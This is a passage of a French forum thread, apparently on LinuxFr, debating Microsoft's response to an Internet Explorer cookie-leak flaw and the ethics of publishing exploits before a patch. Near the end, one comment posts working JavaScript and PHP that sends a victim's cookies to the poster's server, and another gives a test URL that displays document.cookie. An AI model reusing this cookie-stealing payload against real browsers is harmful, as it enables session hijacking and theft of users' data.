            pBpG, fais attention, tu te mors la queue.

            Il me semble que dans certains de tes posts precedents, tu disais que l'avantage de Microsoft sur le libre, c'est que tout est pareil, et que l'utilisateur, il s'en fout, car ce qui marche sur sa machine, marchera avec la mise a jour.

            Et la, tu nous dit que pour un patch de IE, il faut tester sur TOUTES les configs possibles, parce qu'on n'est pas sur que le comportement soit identique?

            IL ne faut pas exagerer, quand meme!

            Je concois tres bien que ta position sur ce point ( la publication des correctifs lors de failles) est intenable. En effet, tu bosse pour un boite qui, contrairement a ce que tu dis, se fout royalement de savoir si ses produits sont de bonne qualite ou pas, mais d'un autre cote, tu es un connaisseur du libre, ou la qualite est un des buts a atteindre. Mais essaie de rester un peu "homogene" dans tes discours.

            D'accord, on a expressement demande que tu t'exprimes la dessus. Mais tu peux dire: je ne suis pas d'accord avec la position de Microsoft, mais cela n'engage que moi.
            • [^] # Re: et PasBillPasGates dans tout ca ?

              Posté par  . Évalué à -1.

              Ben si pour l'UTILISATEUR il y a peu de differences(il y en a entre les 9x et les NT c'est clair), mais pour MS en interne c'est different, tout comme sur Linux t'as des #ifdef dans ton code selon la raison x y ou z, sous Windows c'est la meme chose, mais pour l'utilisateur il n'y a pas de difference car les comportements sont les memes.
              • [^] # Re: et PasBillPasGates dans tout ca ?

                Posté par  . Évalué à -2.

                Ben si pour l'UTILISATEUR il y a peu de differences

                Quand ça marche il y a peu de différences. Mais en général ça marche pas à cause des incompatibilités. C'est con hein ?
          • [^] # Re: et PasBillPasGates dans tout ca ?

            Posté par  . Évalué à -1.

            Win95
            Win98
            WinME
            Win2000
            WinNT4


            T'es con, ton chef a expliqué que tout était compatible.

            A la limite une autre boite pourrait vouloir vérifier, vous c'est vos plateformes.

            Mais encore une fois, tu nous montre que les arguments pro-MS sont incompatibles les uns avec les autres. Situation qu'on ne trouve qu'avec de la mauvaise foi systématique. S'il fallait encore des preuves.
      • [^] # Re: et PasBillPasGates dans tout ca ?

        Posté par  . Évalué à 4.

        Lorsqu'il y a un trou de sécurité, ou on bon gros crasher, enfin un bug très grave quoi, on ets pas obligé d'attendre d'avoir un bugfix nickel pour le sortir.

        On fait ce que l'on appel un "stopper" qui empèche le bug de se manifester, même si ça couper temporairement certaines fonctionalités ou si c'est "crade" d'un point de vue code. Rajouter un "if" bien placé pour empècher un site d'accéder à un cookie hors domaine, c'est quand même pas la mer à boire. Après, on corrige réellement le bug de manière propre, et on sort un deuxième correctif.

        C'est comme ça que ça marche dans le libre en tout cas. Que ce soit le noyau, ssh ou un serveur FTP, quand un trou de sécuité est trouvé il est un patch pour le trou qui sort dans les heures qui suivent (quelques jours dans les pires cas). Pour Mozilla, peu de temps avant les sorties des Milestone ils mettent des "stoppers" pour les regressions ou les trucs trop graves, ...

        Un trou de sécurité comme celui-là ne demande certainement pas deux semaines pour être corrigé, surtout si tu as des employés à pleins temps pour travailler dessus. Tester sur une vingtaine de machines bien différentes que le patch marche ne demande pas plus de quelques heures; et sortir un patch 'béta' bien précisé comme tel ce n'est pas impensable non plus si MS veut faire 666 tests supllémentaires avant de sortir un patch final...

        Non, franchement, deux semaines pour corriger ça (avec tous les risques que contient ce bug), c'est du foutage de g***
  • # Et après on s'étonne de l'augmentation de le vente de somnifères !

    Posté par  . Évalué à 2.

    Moi, ce qui m'interpelle, c'est comment font-ils chez MS pour que tous leur employés affichent une aussi mauvaise foi ?
    C'est incroyable qu'ils mentent tous comme ça.

    On doit vraiment pas avoir la conscience tranquille quand on bosse dans cette boite. Et ça doit être dur de dormir !
    • [^] # Re: Et après on s'étonne de l'augmentation de le vente de somnifères !

      Posté par  . Évalué à 0.

      C'est simple tous les employes sont des repris de justice qui ont assassine au moins 14 personnes chacun, d'autre part on doit signer un pacte avec le diable et sacrifier 4 vierges avant d'etre acceptes.

      Une autre explication est que tu vous (consciemment ou inconsciemment) ne comprenez rien a ce que le gars du team securite a dit, qui est en gros:

      On peut reveler les trous de securite, mais pour les DETAILS/OUTILS permettant d'EXPLOITER la faille il faudrait attendre la sortie du patch.

      Il n'a JAMAIS dit qu'il ne fallait pas reveler les failles.
      • [^] # troll à part...

        Posté par  . Évalué à 1.

        Je m'en doute bien...

        C'est vrai que mon post était ironique, ta réponse l'est aussi: 1-1, la balle au centre, donc soyons sérieux...

        Ce que je voudrais savoir (sans troll, ni ironie, aucune) c'est pourquoi ce représentant de MS ne fait pas de Mea Culpa et préfère au lieu de cela attribuer des torts à la personne qui a trouvé cette faille. Je veux bien croire que compte tenu du fait qu'Explorer est propriétaire il n'est pas dans l'intérêt de MS de divulguer les trous de sécurité. Mais il faut aussi reconnaître ses torts. Ne penses-tu pas (comme beaucoup ici) qu'il y a souvent dans le discourt de MS, que tu reprends parfois, énormément d'hypocrisie et parfois même du foutage de gueule ? Ne penses-tu pas que les FUD sont fréquents ?

        Bref, penses-tu vraiment que le discourt officiel de MS est toujours honnête ?
        • [^] # Re: troll à part...

          Posté par  . Évalué à 0.

          De mon point de vue personnel, je trouve que certaines fois ils disent des trucs qu'ils feraient mieux de ne pas dire et il arrive de temps en temps que je sois pas d'accord avec le discours officiel. Mais de la a dire qu'il y a enormement d'hypocrisie/foutage de gueule/FUD, je trouve qu'il n'y en a pas plus que dans les autres boites comme Sun/IBM/Oracle/... ce qui fait que j'en ai un peu marre que l'on cloue toujours MS au pilori sans regarder ce que font tous les autres.

          Dans le cas present, il n'a aucune raison de faire son mea culpa et il ne rejette pas la faute du bug sur quelqu'un d'autre mais le fait d'avoir donne les details de l'exploit avant que le patch ne soit sorti.

          Il gueule sur l'autre gars car il a donne les details de l'exploit, si ce gars avait juste dit "il y a un trou de securite dangereux dans IE concernant les cookies, vous feriez mieux de bloquer ci et ca" et apres la sortie du patch il montre les details, tout le monde aurait ete content, mais il a prefere filer l'exploit avant que le patch sorte ce qui met plein de gens en danger.
          • [^] # Re: troll à part...

            Posté par  . Évalué à -1.

            Merci.


            (-1)
          • [^] # Re: troll à part...

            Posté par  . Évalué à -1.

            Mais de la a dire qu'il y a enormement d'hypocrisie/foutage de gueule/FUD, je trouve qu'il n'y en a pas plus que dans les autres boites comme Sun/IBM/Oracle/...

            QUI dit le contraire ?

            Si j'entends mon voisin tenir des propos racistes, et que je le critiques à cause de ça, suis-je tenu de faire la liste de tous les fachos du quartier, et de les nommer quand la critique que j'ai à faire porte sur mon voisin ?

            On SAIT ce que font les autres, et on sait aussi que les conséquences ne sont pas les memes.

            Tu deviens sérieusement gavant à utiliser cette excuse "les autres c'est pareil", car ça ne justifie absolument rien, et tu utilises un contre-argument HS. Quand on parle de MS, on ne parle pas d'autres boites, donc on ne parle que de MS. Tout comme quand ça trolle sur Java, on parle essentiellement de Sun et pas de MS.

            Et quand tu dis qu'il y a autant de FUD que chez IBM et autres, j'espere que cet "autant" est aussi synonyme de "beaucoup", ou alors c'est que tu ne les écoutes pas.
            • [^] # Re: troll à part...

              Posté par  . Évalué à 2.

              Tous ceux qui prennent cela comme pretexte pour justifier tout et n'importe quoi contre MS disent le contraire, car des que l'on parle d'IBM ici, c'est carremment des louages qu'on entend de la part de ces memes personnes, et pas un mot sur le reste. A croire que c'est pardonnable si on est copain-copain avec Linux et pas si on est de l'autre cote.

              Je n'ai jamais dit que ca justifiait quoi que ce soit, simplement taper uniquement sur la gueule d'une societe en oubliant volontairement les autres c'est TRES facile.

              IBM et Sun quand on en parle ici, ce cote la personne ne le cite alors que MS ca apparait sur quasiment toutes les news, qu'elles soient purement techniques ou pas, ce qui montre bien le cote "2 poids 2 mesures".
              • [^] # Re: troll à part...

                Posté par  (site web personnel) . Évalué à 2.

                a ton avis oracle & ibm il font du FUD contre linux ?
                bon alors si MS se fais flamer sur dlfp c'est merité ..
              • [^] # Re: troll à part...

                Posté par  . Évalué à -2.

                car des que l'on parle d'IBM ici, c'est carremment des louages qu'on entend de la part de ces memes personnes

                Totalement faux, il y a toujours des critiques sur IBM, les points positifs sont essentiellement que ça fait de la pub pour Linux, ça ne concerne pas IBM. -> mensonges de ta part

                Je n'ai jamais dit que ca justifiait quoi que ce soit, simplement taper uniquement sur la gueule d'une societe en oubliant volontairement les autres c'est TRES facile.

                Ce n'est pas ce qui se fait ici. Tu mens sur les propos qui sont tenus.

                IBM et Sun quand on en parle ici, ce cote la personne ne le cite alors que MS ca apparait sur quasiment toutes les news,

                MS : forcément à toutes les news, puisque c'est leur pratiques, et le monopole est extremement dangereux.
                IBM/Sun/etc. Il y a autant de critiques, mais eux apportent parfois des bons trucs, et ne sont pas en situation d'agresseurs.
                -> encore de la diffamation envers l'ensemble des posteurs de dlfp
                Il n'y a pas 2 poids 2 mesures.


                -> mensonge systématique, jamais vu des posts qui puent autant que les tiens.
                • [^] # priere

                  Posté par  . Évalué à -2.

                  utilisez le texte gras avec parcimonie, ce commentaire m'a presque fait peur, ouh j'en suis tout humide...

                  -1
          • [^] # Re: troll à part...

            Posté par  . Évalué à -1.

            Je trouve que le mec a bien fait de filer l'exploit, ca va forcer microsoft a se bouger le c... un peu plus vite.

            Si il n'avait pas publié l'exploit, après tout rien ne dit que ce patch ne serait pas sorti un peu plus tard parceque les devs ont autre chose a foutre et que de toutes facons personne ne peut l'exploiter.
  • # Mauvaise presse

    Posté par  . Évalué à -1.

    Si tout le monde (tous les media) en parle ça va faire beaucoup de tort au geant
    http://www.01net.com/rdn?oid=167089&rub=2135(...)
  • # QQ infos supplementaires ici...

    Posté par  . Évalué à -4.

    Bon j'avais poste la news hier me semble-t-il.... mais bon...
    il y a qq details sur le site de 01 net

    http://www.01net.com/rdn?oid=167089&rub=2135(...)
  • # Un exemple de code pour la faille

    Posté par  . Évalué à 5.

    Voici ce qu'on peut faire:
    une page iebug.html (foo.bar c'est moi, fuu.bar c'est mon concurent) sur mon serveur www.foo.bar

    <script language=JavaScript>
    var url="about://fuu.bar/<script language=javascript>"+
    "document.location='http://www.foo.bar/iebug.phtml?mybug='+document.cookie;$lt;/script\(...)
    document.location=url;
    </script>


    et un fichier iebug.phtml

    <? echo $mybug; ?>

    En fait, vous faites ce que vous voulez des données. Par exemple fnac.com est bien content de savoir que vous allez sur amazon.com et vice versa ...
  • # test rapide de la faille

    Posté par  . Évalué à 5.

    taper ceci dans votre url

    about://www.linuxfr.org/<script%20language=JavaScript>alert(document.cookie);</script>
  • # C'est pas nouveau ...

    Posté par  . Évalué à 2.

    Mais si, souvenez-vous : ils avaient dit, en gros, que le closed-source est plus sûr parce qu'on pouvait moins facilement trouver les failles. Approhe purement microsoftienne du problème ...

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.